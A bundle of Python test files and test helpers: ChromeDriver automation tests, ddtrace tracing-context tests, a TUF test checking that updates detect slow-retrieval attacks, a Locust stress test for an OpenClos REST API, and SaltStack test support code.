mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testClickElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
driver.TouchDown(loc['x'], loc['y'])
driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
class ChromeDriverLogTest(unittest.TestCase):
"""Tests that chromedriver produces the expected log file."""
UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability'
LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP
def testChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path)
try:
driver = chromedriver.ChromeDriver(
chromedriver_server.GetUrl(), chrome_binary=_CHROME_BINARY,
experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 })
driver.Quit()
except chromedriver.ChromeDriverException, e:
self.assertTrue(self.LOG_MESSAGE in e.message)
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertTrue(self.LOG_MESSAGE in f.read())
class PerformanceLoggerTest(ChromeDriverBaseTest):
"""Tests chromedriver tracing support and Inspector event collection."""
def testPerformanceLogger(self):
driver = self.CreateDriver(
experimental_options={'perfLoggingPrefs': {
'enableTimeline': True,
'traceCategories': 'webkit.console,blink.console'
}}, performance_log_level='ALL')
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
# Mark the timeline; later we will verify the marks appear in the trace.
driver.ExecuteScript('console.time("foobar")')
driver.ExecuteScript('console.timeEnd("foobar")')
logs = driver.GetLog('performance')
driver.Quit()
marked_timeline_events = []
seen_log_domains = {}
for entry in logs:
devtools_message = json.loads(entry['message'])['message']
method = devtools_message['method']
domain = method[:method.find('.')]
seen_log_domains[domain] = True
if method != 'Tracing.dataCollected':
continue
self.assertTrue('params' in devtools_message)
self.assertTrue(isinstance(devtools_message['params'], dict))
cat = devtools_message['params'].get('cat', '')
# Depending on Chrome version, the events may occur for the webkit.console
# or blink.console category. They will only occur for one of them.
if (cat == 'blink.console' or cat == 'webkit.console'):
self.assertTrue(devtools_message['params']['name'] == 'foobar')
marked_timeline_events.append(devtools_message)
self.assertEquals(2, len(marked_timeline_events))
self.assertEquals({'Network', 'Page', 'Timeline', 'Tracing'},
set(seen_log_domains.keys()))
class SessionHandlingTest(ChromeDriverBaseTest):
"""Tests for session operations."""
def testQuitASessionMoreThanOnce(self):
driver = self.CreateDriver()
driver.Quit()
driver.Quit()
def testGetSessions(self):
driver = self.CreateDriver()
response = driver.GetSessions()
self.assertEqual(1, len(response))
driver2 = self.CreateDriver()
response = driver2.GetSessions()
self.assertEqual(2, len(response))
class RemoteBrowserTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver remote browser capability."""
def setUp(self):
self.assertTrue(_CHROME_BINARY is not None,
'must supply a chrome binary arg')
def testConnectToRemoteBrowser(self):
port = self.FindFreePort()
temp_dir = util.MakeTempDir()
process = subprocess.Popen([_CHROME_BINARY,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir])
if process is None:
raise RuntimeError('Chrome could not be started with debugging port')
try:
driver = self.CreateDriver(debugger_address='127.0.0.1:%d' % port)
driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
finally:
process.terminate()
def FindFreePort(self):
for port in range(10000, 10100):
try:
socket.create_connection(('127.0.0.1', port), 0.2).close()
except socket.error:
return port
raise RuntimeError('Cannot find open port')
class PerfTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver perf."""
def setUp(self):
self.assertTrue(_REFERENCE_CHROMEDRIVER is not None,
'must supply a reference-chromedriver arg')
def _RunDriverPerfTest(self, name, test_func):
"""Runs a perf test comparing a reference and new ChromeDriver server.
Args:
name: The name of the perf test.
test_func: Called with the server url to perform the test action. Must
return the time elapsed.
"""
class Results(object):
ref = []
new = []
ref_server = server.Server(_REFERENCE_CHROMEDRIVER)
results = Results()
result_url_pairs = zip([results.new, results.ref],
[_CHROMEDRIVER_SERVER_URL, ref_server.GetUrl()])
for iteration in range(30):
for result, url in result_url_pairs:
result += [test_func(url)]
# Reverse the order for the next run.
result_url_pairs = result_url_pairs[::-1]
def PrintResult(build, result):
mean = sum(result) / len(result)
avg_dev = sum([abs(sample - mean) for sample in result]) / len(result)
print 'perf result', build, name, mean, avg_dev, result
util.AddBuildStepText('%s %s: %.3f+-%.3f' % (
build, name, mean, avg_dev))
# Discard first result, which may be off due to cold start.
PrintResult('new', results.new[1:])
PrintResult('ref', results.ref[1:])
def testSessionStartTime(self):
def Run(url):
start = time.time()
driver = self.CreateDriver(url)
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('session start', Run)
def testSessionStopTime(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.Quit()
end = time.time()
return end - start
self._RunDriverPerfTest('session stop', Run)
def testColdExecuteScript(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.ExecuteScript('return 1')
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('cold exe js', Run)
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option(
'', '--chromedriver',
help='Path to chromedriver server (REQUIRED!)')
parser.add_option(
'', '--log-path',
help='Output verbose server logs to this file')
parser.add_option(
'', '--reference-chromedriver',
help='Path to the reference chromedriver server')
parser.add_option(
'', '--chrome', help='Path to a build of the chrome binary')
parser.add_option(
'', '--chrome-version', default='HEAD',
help='Version of chrome. Default is \'HEAD\'.')
parser.add_option(
'', '--filter', type='string', default='*',
help=('Filter for specifying what tests to run, "*" will run all. E.g., '
'*testStartStop'))
parser.add_option(
'', '--android-package',
help=('Android package key. Possible values: ' +
str(_ANDROID_NEGATIVE_FILTER.keys())))
options, args = parser.parse_args()
options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver)
if not options.chromedriver or not os.path.exists(options.chromedriver):
parser.error('chromedriver is required or the given path is invalid.' +
'Please run "%s --help" for help' % __file__)
global _CHROMEDRIVER_BINARY
_CHROMEDRIVER_BINARY = options.chromedriver
if (options.android_package and
options.android_package not in _ANDROID_NEGATIVE_FILTER):
parser.error('Invalid --android-package')
chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path)
global _CHROMEDRIVER_SERVER_URL
_CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl()
global _REFERENCE_CHROMEDRIVER
_REFERENCE_CHROMEDRIVER = util.GetAbsolutePathOfUserPath(
options.reference_chromedriver)
global _CHROME_BINARY
if options.chrome:
_CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome)
else:
_CHROME_BINARY = None
global _ANDROID_PACKAGE_KEY
_ANDROID_PACKAGE_KEY = options.android_package
if options.filter == '*':
if _ANDROID_PACKAGE_KEY:
negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY]
else:
negative_filter = _GetDesktopNegativeFilter(options.chrome_version)
options.filter = '*-' + ':__main__.'.join([''] + negative_filter)
all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule(
sys.modules[__name__])
tests = unittest_util.FilterTestSuite(all_tests_suite, options.filter)
ChromeDriverTest.GlobalSetUp()
MobileEmulationCapabilityTest.GlobalSetUp()
result = unittest.TextTestRunner(stream=sys.stdout, verbosity=2).run(tests)
ChromeDriverTest.GlobalTearDown()
MobileEmulationCapabilityTest.GlobalTearDown()
sys.exit(len(result.failures) + len(result.errors))
|
test_context.py
|
import mock
import threading
from unittest import TestCase
from nose.tools import eq_, ok_
from tests.test_tracer import get_dummy_tracer
from ddtrace.span import Span
from ddtrace.context import Context, ThreadLocalContext
from ddtrace.ext.priority import USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP
class TestTracingContext(TestCase):
"""
Tests related to the ``Context`` class that hosts the trace for the
current execution flow.
"""
def test_add_span(self):
# it should add multiple spans
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
eq_('fake_span', ctx._trace[0].name)
eq_(ctx, span.context)
def test_context_sampled(self):
# a context is sampled if the spans are sampled
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ok_(ctx._sampled is True)
ok_(ctx.sampling_priority is None)
def test_context_priority(self):
# a context is sampled if the spans are sampled
ctx = Context()
for priority in [USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP, None, 999]:
ctx.sampling_priority = priority
span = Span(tracer=None, name=('fake_span_%s' % repr(priority)))
ctx.add_span(span)
# It's "normal" to have sampled be true even when priority sampling is
# set to 0 or -1. It would stay false even even with priority set to 2.
# The only criteria to send (or not) the spans to the agent should be
# this "sampled" attribute, as it's tightly related to the trace weight.
ok_(ctx._sampled is True, 'priority has no impact on sampled status')
eq_(priority, ctx.sampling_priority)
def test_current_span(self):
# it should return the current active span
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(span, ctx.get_current_span())
def test_close_span(self):
# it should keep track of closed spans, moving
# the current active to it's parent
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
eq_(1, ctx._finished_spans)
ok_(ctx.get_current_span() is None)
def test_get_trace(self):
# it should return the internal trace structure
# if the context is finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
trace, sampled = ctx.get()
eq_(1, len(trace))
eq_(span, trace[0])
ok_(sampled is True)
# the context should be empty
eq_(0, len(ctx._trace))
eq_(0, ctx._finished_spans)
ok_(ctx._current_span is None)
ok_(ctx._sampled is True)
def test_get_trace_empty(self):
# it should return None if the Context is not finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
trace, sampled = ctx.get()
ok_(trace is None)
ok_(sampled is None)
def test_finished(self):
# a Context is finished if all spans inside are finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
ok_(ctx.is_finished())
def test_finished_empty(self):
# a Context is not finished if it's empty
ctx = Context()
ok_(ctx.is_finished() is False)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans(self, log):
# when the root parent is finished, notify if there are spans still pending
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
unfinished_spans_log = log.call_args_list[-3][0][2]
child_1_log = log.call_args_list[-2][0][1]
child_2_log = log.call_args_list[-1][0][1]
eq_(2, unfinished_spans_log)
ok_('name child_1' in child_1_log)
ok_('name child_2' in child_2_log)
ok_('duration 0.000000s' in child_1_log)
ok_('duration 0.000000s' in child_2_log)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_disabled(self, log):
# the trace finished status logging is disabled
tracer = get_dummy_tracer()
tracer.debug_logging = False
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_when_ok(self, log):
# if the unfinished spans logging is enabled but the trace is finished, don't log anything
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
# close the trace
child.finish()
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
def test_thread_safe(self):
# the Context must be thread-safe
ctx = Context()
def _fill_ctx():
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
eq_(100, len(ctx._trace))
def test_clone(self):
ctx = Context()
ctx.sampling_priority = 2
# manually create a root-child trace
root = Span(tracer=None, name='root')
child = Span(tracer=None, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
cloned_ctx = ctx.clone()
eq_(cloned_ctx._parent_trace_id, ctx._parent_trace_id)
eq_(cloned_ctx._parent_span_id, ctx._parent_span_id)
eq_(cloned_ctx._sampled, ctx._sampled)
eq_(cloned_ctx._sampling_priority, ctx._sampling_priority)
eq_(cloned_ctx._current_span, ctx._current_span)
eq_(cloned_ctx._trace, [])
eq_(cloned_ctx._finished_spans, 0)
class TestThreadContext(TestCase):
"""
Ensures that a ``ThreadLocalContext`` makes the Context
local to each thread.
"""
def test_get_or_create(self):
# asking the Context multiple times should return
# always the same instance
l_ctx = ThreadLocalContext()
eq_(l_ctx.get(), l_ctx.get())
def test_set_context(self):
# the Context can be set in the current Thread
ctx = Context()
local = ThreadLocalContext()
ok_(local.get() is not ctx)
local.set(ctx)
ok_(local.get() is ctx)
def test_multiple_threads_multiple_context(self):
# each thread should have it's own Context
l_ctx = ThreadLocalContext()
def _fill_ctx():
ctx = l_ctx.get()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
# the main instance should have an empty Context
# because it has not been used in this thread
ctx = l_ctx.get()
eq_(0, len(ctx._trace))
|
test_slow_retrieval_attack.py
|
#!/usr/bin/env python
"""
<Program Name>
test_slow_retrieval_attack.py
<Author>
Konstantin Andrianov
<Started>
March 13, 2012
<Copyright>
See LICENSE for licensing information.
<Purpose>
Simulate slow retrieval attack. A simple client update vs. client
update implementing TUF.
During the slow retrieval attack, attacker is able to prevent clients from
being aware of interference with receiving updates by responding to client
requests so slowly that automated updates never complete.
NOTE: The interposition provided by 'tuf.interposition' is used to intercept
all calls made by urllib/urillib2 to certain network locations specified in
the interposition configuration file. Look up interposition.py for more
information and illustration of a sample contents of the interposition
configuration file. Interposition was meant to make TUF integration with an
existing software updater an easy process. This allows for more flexibility
to the existing software updater. However, if you are planning to solely use
TUF there should be no need for interposition, all necessary calls will be
generated from within TUF.
There is no difference between 'updates' and 'target' files.
"""
# Help with Python 3 compatability, where the print statement is a function, an
# implicit relative import is invalid, and the '/' operator performs true
# division. Example: print 'hello world' raises a 'SyntaxError' exception.
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from multiprocessing import Process
import os
import random
import subprocess
import sys
import time
import tuf
import urllib
import tuf.interposition
import tuf.tests.util_test_tools as util_test_tools
class SlowRetrievalAttackAlert(Exception):
pass
def _download(url, filename, using_tuf=False):
if using_tuf:
try:
tuf.interposition.urllib_tuf.urlretrieve(url, filename)
except tuf.NoWorkingMirrorError, exception:
slow_retrieval = False
for mirror_url, mirror_error in exception.mirror_errors.iteritems():
if isinstance(mirror_error, tuf.SlowRetrievalError):
slow_retrieval = True
break
# We must fail due to a slow retrieval error; otherwise we will exit with
# a "successful termination" exit status to indicate that slow retrieval
# detection failed.
if slow_retrieval:
print('TUF stopped the update because it detected slow retrieval.')
sys.exit(-1)
else:
print('TUF stopped the update due to something other than slow retrieval.')
sys.exit(0)
else:
urllib.urlretrieve(url, filename)
def test_slow_retrieval_attack(using_tuf=False, mode=None):
WAIT_TIME = 60 # Number of seconds to wait until download completes.
ERROR_MSG = 'Slow retrieval attack succeeded (using_tuf: '+str(using_tuf)+', mode: '+\
str(mode)+').'
# Launch the server.
port = random.randint(30000, 45000)
command = ['python', 'slow_retrieval_server.py', str(port), mode]
server_process = subprocess.Popen(command, stderr=subprocess.PIPE)
time.sleep(1)
try:
# Setup.
root_repo, url, server_proc, keyids = \
util_test_tools.init_repo(using_tuf, port=port)
reg_repo = os.path.join(root_repo, 'reg_repo')
downloads = os.path.join(root_repo, 'downloads')
# Add file to 'repo' directory: {root_repo}
filepath = util_test_tools.add_file_to_repository(reg_repo, 'A'*30)
file_basename = os.path.basename(filepath)
url_to_file = url+'reg_repo/'+file_basename
downloaded_file = os.path.join(downloads, file_basename)
if using_tuf:
tuf_repo = os.path.join(root_repo, 'tuf_repo')
# Update TUF metadata before attacker modifies anything.
util_test_tools.tuf_refresh_repo(root_repo, keyids)
# Modify the url. Remember that the interposition will intercept
# urls that have 'localhost:9999' hostname, which was specified in
# the json interposition configuration file. Look for 'hostname'
# in 'util_test_tools.py'. Further, the 'file_basename' is the target
# path relative to 'targets_dir'.
url_to_file = 'http://localhost:9999/'+file_basename
# Client tries to download.
# NOTE: if TUF is enabled the metadata files will be downloaded first.
proc = Process(target=_download, args=(url_to_file, downloaded_file, using_tuf))
proc.start()
proc.join(WAIT_TIME)
# In case the process did not exit or successfully exited, we failed.
if not proc.exitcode:
proc.terminate()
raise SlowRetrievalAttackAlert(ERROR_MSG)
finally:
server_process.kill()
util_test_tools.cleanup(root_repo, server_proc)
# Stimulates two kinds of slow retrieval attacks.
# mode_1: When download begins,the server blocks the download
# for a long time by doing nothing before it sends first byte of data.
# mode_2: During the download process, the server blocks the download
# by sending just several characters every few seconds.
try:
test_slow_retrieval_attack(using_tuf=False, mode = "mode_1")
except SlowRetrievalAttackAlert, error:
print(error)
print()
try:
test_slow_retrieval_attack(using_tuf=False, mode = "mode_2")
except SlowRetrievalAttackAlert, error:
print(error)
print()
try:
test_slow_retrieval_attack(using_tuf=True, mode = "mode_1")
except SlowRetrievalAttackAlert, error:
print(error)
print()
try:
test_slow_retrieval_attack(using_tuf=True, mode = "mode_2")
except SlowRetrievalAttackAlert, error:
print(error)
print()
|
stressRest.py
|
'''
Created on Jan 5, 2015
@author: moloyc
Before running this test install locust - 'pip install locustio'
Running the test:
1. locust -f stressRest.py
2. Open browser http://localhost:8089/
3. Start stress test
4. Once done, download the csv file and save as locust.csv in this directory
5. python postProcess.py
6. The result is in 'out.csv'
'''
from jnpr.openclos.propLoader import loadLoggingConfig
from locust import HttpLocust, TaskSet, task
import json
import random
import time
import logging
moduleName = 'stressRest'
def getFabricPostBody():
fabric = random.choice(ipFabrics)
fabric['ipFabric']['name'] = 'fabric-'+str(time.time())
return fabric
class MyTaskSet(TaskSet):
def on_start(self):
loadLoggingConfig(appName = moduleName)
self.logger = logging.getLogger(moduleName)
self.fabricCount = 0
'''
restServer = RestServer()
restServer.host = 'localhost'
restServer.port = 9090
restServer.initRest()
t = threading.Thread(target=restServer.start)
t.daemon = True
t.start()
'''
@task(10)
def getIpFabrics(self):
response = self.client.get('/openclos/ip-fabrics')
if response._content is not None:
jsonContent = json.loads(response._content)
self.fabricIds = [f['id'] for f in jsonContent['ipFabrics']['ipFabric']]
#self.logger.info(self.fabricIds)
@task(10)
def getIpFabric(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
#self.logger.info('GET /openclos/ip-fabrics/%s' % (id))
self.client.get('/openclos/ip-fabrics/%s' % (id))
@task(5)
def createCabling(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
self.client.put('/openclos/ip-fabrics/%s/cabling-plan' % (id))
@task(5)
def createConfigs(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
self.client.put('/openclos/ip-fabrics/%s/device-configuration' % (id))
@task(10)
def getDevices(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
response = self.client.get('/openclos/ip-fabrics/%s/devices' % (id))
#self.logger.info("RESPONSE: " + str(response.status_code) + ' ' + response.reason)
@task(2)
def createIpFabric(self):
if self.fabricCount > 10:
return
self.fabricCount += 1
kwargs = {}
kwargs['headers'] = {'Content-Type':'application/json'}
response = self.client.post('/openclos/ip-fabrics', json.dumps(getFabricPostBody()), **kwargs)
#self.logger.info("RESPONSE: " + str(response.status_code) + ' ' + response.reason)
@task(1)
def getConf(self):
self.client.get('/openclos/conf')
ipFabrics = [
{"ipFabric": {
"name": "name",
"spineDeviceType": "qfx5100-24q-2p",
"spineCount": 2,
"spineAS": 5,
"leafSettings": [{"deviceType": "ex4300-24p"},{"deviceType": "qfx5100-48s-6q"}],
"leafCount": 6,
"leafAS": 10,
"topologyType": "threeStage",
"loopbackPrefix": "12.1.1.1/21",
"vlanPrefix": "15.1.1.1/20",
"interConnectPrefix": "14.1.1.1/21",
"outOfBandAddressList": "10.204.244.95",
"managementPrefix": "192.168.2.1/24",
"description": "test",
"hostOrVmCountPerLeaf": 254,
"devicePassword": "password",
"outOfBandGateway": "192.168.2.1",
"devices": [
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-01", "username": "root", "password": "password", "deployStatus": "deploy"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-02"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-01", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-02", "deployStatus": "deploy"},
{"role": "leaf", "name": "test-leaf-03"},
{"role": "leaf", "name": "test-leaf-04"},
{"role": "leaf", "name": "test-leaf-05"},
{"role": "leaf", "name": "test-leaf-06"}
]
}},
{"ipFabric": {
"name": "name",
"spineDeviceType": "qfx5100-24q-2p",
"spineCount": 4,
"spineAS": 5,
"leafSettings": [{"deviceType": "ex4300-24p"},{"deviceType": "qfx5100-48s-6q"}],
"leafCount": 10,
"leafAS": 10,
"topologyType": "threeStage",
"loopbackPrefix": "12.1.1.1/21",
"vlanPrefix": "15.1.1.1/20",
"interConnectPrefix": "14.1.1.1/21",
"outOfBandAddressList": "10.204.244.95",
"managementPrefix": "192.168.2.1/24",
"description": "test",
"hostOrVmCountPerLeaf": 254,
"devicePassword": "password",
"outOfBandGateway": "192.168.2.1",
"devices": [
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-01", "username": "root", "password": "password", "deployStatus": "deploy"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-02"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-03"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-04"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-01", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-02", "deployStatus": "deploy"},
{"role": "leaf", "name": "test-leaf-03"},
{"role": "leaf", "name": "test-leaf-04"},
{"role": "leaf", "name": "test-leaf-05"},
{"role": "leaf", "name": "test-leaf-06"},
{"role": "leaf", "name": "test-leaf-07"},
{"role": "leaf", "name": "test-leaf-08"},
{"role": "leaf", "name": "test-leaf-09"},
{"role": "leaf", "name": "test-leaf-10"}
]
}},
{"ipFabric": {
"name": "name",
"spineDeviceType": "qfx5100-24q-2p",
"spineCount": 8,
"spineAS": 5,
"leafSettings": [{"deviceType": "ex4300-24p"},{"deviceType": "qfx5100-48s-6q"}],
"leafCount": 20,
"leafAS": 10,
"topologyType": "threeStage",
"loopbackPrefix": "12.1.1.1/21",
"vlanPrefix": "15.1.1.1/16",
"interConnectPrefix": "14.1.1.1/21",
"outOfBandAddressList": "10.204.244.95",
"managementPrefix": "192.168.2.1/24",
"description": "test",
"hostOrVmCountPerLeaf": 254,
"devicePassword": "password",
"outOfBandGateway": "192.168.2.1",
"devices": [
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-01", "username": "root", "password": "password", "deployStatus": "deploy"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-02"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-03"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-04"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-05"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-06"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-07"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-08"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-01", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-02", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-03"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-04"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-05"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-06"},
{"role": "leaf", "name": "test-leaf-07"},
{"role": "leaf", "name": "test-leaf-08"},
{"role": "leaf", "name": "test-leaf-09"},
{"role": "leaf", "name": "test-leaf-10"},
{"role": "leaf", "name": "test-leaf-11"},
{"role": "leaf", "name": "test-leaf-12"},
{"role": "leaf", "name": "test-leaf-13"},
{"role": "leaf", "name": "test-leaf-14"},
{"role": "leaf", "name": "test-leaf-15"},
{"role": "leaf", "name": "test-leaf-16"},
{"role": "leaf", "name": "test-leaf-17"},
{"role": "leaf", "name": "test-leaf-18"},
{"role": "leaf", "name": "test-leaf-19"},
{"role": "leaf", "name": "test-leaf-20"}
]
}}
]
class MyLocust(HttpLocust):
host = "http://192.168.63.173:20080"
min_wait = 250
max_wait = 500
stop_timeout = 15000
task_set = MyTaskSet
|
helpers.py
|
# -*- coding: utf-8 -*-
"""
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
from __future__ import absolute_import, print_function, unicode_literals
import base64
import errno
import fnmatch
import functools
import inspect
import logging
import os
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
from contextlib import contextmanager
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.pycrypto
import salt.utils.stringutils
import salt.utils.versions
from salt.ext import six
from salt.ext.six.moves import builtins, range
from saltfactories.utils.ports import get_unused_localhost_port
from saltfactories.utils.processes.bases import ProcessResult
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
"PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skipif(
PRE_PYTEST_SKIP_OR_NOT, reason=PRE_PYTEST_SKIP_REASON
)
def no_symlinks():
"""
Check if git is installed and has symlinks enabled in the configuration.
"""
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ""
try:
output = subprocess.Popen(
["git", "config", "--get", "core.symlinks"],
cwd=RUNTIME_VARS.TMP,
stdout=subprocess.PIPE,
).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == "true":
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
"""
Mark a test case as a destructive test for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__destructive_test__", True)
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
reason = "Destructive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def expensiveTest(caller):
"""
